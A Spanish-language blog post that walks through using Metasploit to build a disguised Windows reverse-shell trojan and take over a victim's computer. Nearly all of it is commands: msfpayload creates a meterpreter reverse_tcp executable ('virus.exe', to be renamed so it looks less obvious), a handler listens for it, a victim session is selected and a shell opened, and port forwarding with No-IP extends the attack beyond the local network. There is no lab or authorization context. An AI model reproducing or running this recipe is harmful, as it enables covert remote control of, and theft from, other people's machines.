Bueno lo primero que de demos saber, es que metasploit es una herramienta de penetración de código libre, desarrollado para ejecutar exploits a un objetivo remoto. Metasploit cuenta con la mayor base de datos de exploits públicos y probados y puede ser usado para detectar las vulnerabilidades de nuestros sistemas para protegerlos o usar esas vulnerabilidades para obtener acceso a sistemas remotos. Es una herramienta bastante poderosa para los test de penetración y es algo que todo profesional de seguridad debe dominar. Puede ser un poco complicado al inicio pero todo es cuestión de paciencia y dedicación.
bueno ahora si empecemos.
lo primero que debemos hacer es abrir una terminal y poner
>> msfconsole
recuerden que con eso se abre la terminal de metasploit.
>> msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=4444 x> Desktop/virus.exe
* En LHOST deben poner su ip local, la pueden ver abriendo una terminal nueva y escribiendo ifconfig.
* LPORT tiene que ser el puerto 4444 solo déjenlo así.
* /root/ es la carpeta donde quedara guardado el exploit que crearan, pueden cambiar esa ruta si desean y poner /root/Desktop/ para que el programa se guarde directamente en el escritorio.
* virus.exe es el programa ejecutable que se creara, pero ustedes ponen otro nombre que no sea ta obvio.
>> use exploit/multi/handler
hay lo que hacemos es definir el exploit que se usara para el ataque.
>> set payload windows/meterpreter/reverse_tcp
* aquí configuramos o seleccionamos el payload que se utilizara.
>> set LHOST 192.168.x.x
Configuramos la IP del atacante.
>> exploit -j -z
Inicia el ataque en modo escucha en segundo plano.
>> sessions -l
Nos mostrara las sesiones establecidas.
>> sessions -i (id)
Escogemos el equipo victima por medio del id,
que nos da en el paso anterior.
>> shell
Si logramos conseguir una shell quiere desir que ya
estamos dentro del sistema y podemos trabajar, eso
si por medio de consola si deseas conocer alguna,
como funciona puede revisar el este articulo.
si desean realizar el ataque fuera de la red, les
tocaría configurar el puerto en el router y configurar
un NO-IP para ponerlo en el LHOST.
.:: David Noreña ::.
No hay comentarios:
Publicar un comentario